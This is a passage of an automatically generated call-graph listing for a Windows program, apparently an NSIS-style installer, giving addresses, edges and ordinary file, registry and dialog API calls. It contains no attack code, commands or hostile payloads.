4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665